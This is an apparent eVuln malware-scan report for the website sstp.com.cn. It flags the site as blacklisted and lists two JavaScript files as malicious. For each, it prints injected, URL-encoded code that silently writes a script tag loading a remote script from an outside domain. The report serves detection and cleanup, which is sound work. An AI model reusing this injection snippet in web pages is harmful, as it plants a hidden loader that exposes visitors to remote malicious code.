Malware Scanner report for sstp.com.cn

Malicious/Suspicious/Total urls checked: 2/0/15

2 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "sstp.com.cn" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=sstp.com.cn

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://www.sstp.com.cn/	200 OK Content-Length: 79617 Content-Type: text/html	clean
http://www.sstp.com.cn/js/menu_control.js	200 OK Content-Length: 4333 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) ie=document.all?1:0 n=document.layers?1:0 var moveOnScroll=false numberOfMenus=5var hideAll=true function makeMenuBar(obj,nest,vis){ nest=(!nest) ? '':'document.'+nest+'.' this.css=(n) ? eval(nest+'document.'+obj):eval(obj+'.style') this.hideIt=b_hideIt; this.showIt=b_showIt if(ie && vis) this.css.visibility='hidden' this.evnt=(n)? eval(nest+'document.'+obj):eval(obj); this.go=0 this.height=n?this.css.document.height:eval(obj ... 1457 bytes are skipped ... if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+246060*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%65%72%72%6F%72%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports: Avast JS:Includer-ARB [Trj]
http://www.sstp.com.cn/purchase_guide.php	200 OK Content-Length: 2144 Content-Type: text/html	clean
http://www.sstp.com.cn/test404page.js	404 Not Found Content-Length: 2631 Content-Type: text/html	clean
http://www.sstp.com.cn/index.php	200 OK Content-Length: 79617 Content-Type: text/html	clean
http://www.sstp.com.cn/browse.php?type=1	200 OK Content-Length: 74414 Content-Type: text/html	clean
http://www.sstp.com.cn/js/xtree.js	200 OK Content-Length: 2899 Content-Type: application/x-javascript	clean
http://www.sstp.com.cn/js/moveobj.js	200 OK Content-Length: 3357 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var brOK=false; var mie=false; var aver=parseInt(navigator.appVersion.substring(0,1)); var aname=navigator.appName; function checkbrOK() {if(aname.indexOf("Internet Explorer")!=-1) {if(aver>=4) brOK=navigator.javaEnabled(); mie=true; } if(aname.indexOf("Netscape")!=-1) {if(aver>=4) brOK=navigator.javaEnabled();} } var vmin=2; var vmax=5; var vr=2; var timer1; function Chip(chipname,width,height) {this.named ... 2420 bytes are skipped ... if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+246060*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%65%72%72%6F%72%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports: Avast JS:Includer-ARB [Trj]
http://www.sstp.com.cn/add/ads/click.php	403 Forbidden Content-Length: 2255 Content-Type: text/html	clean
http://www.sstp.com.cn/browse.php?type=2	200 OK Content-Length: 74483 Content-Type: text/html	clean
http://www.sstp.com.cn/browse.php?type=3	200 OK Content-Length: 68039 Content-Type: text/html	clean
http://www.sstp.com.cn/browse.php?type=4	200 OK Content-Length: 74448 Content-Type: text/html	clean
http://www.sstp.com.cn/browse.php?type=5	200 OK Content-Length: 74465 Content-Type: text/html	clean
http://www.sstp.com.cn/browse.php?type=6	200 OK Content-Length: 74396 Content-Type: text/html	clean
http://www.sstp.com.cn/browse.php?type=7	200 OK Content-Length: 74518 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: sstp.com.cn

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: sstp.com.cn
Referer: http://www.google.com/search?q=sstp.com.cn

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for sstp.com.cn

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools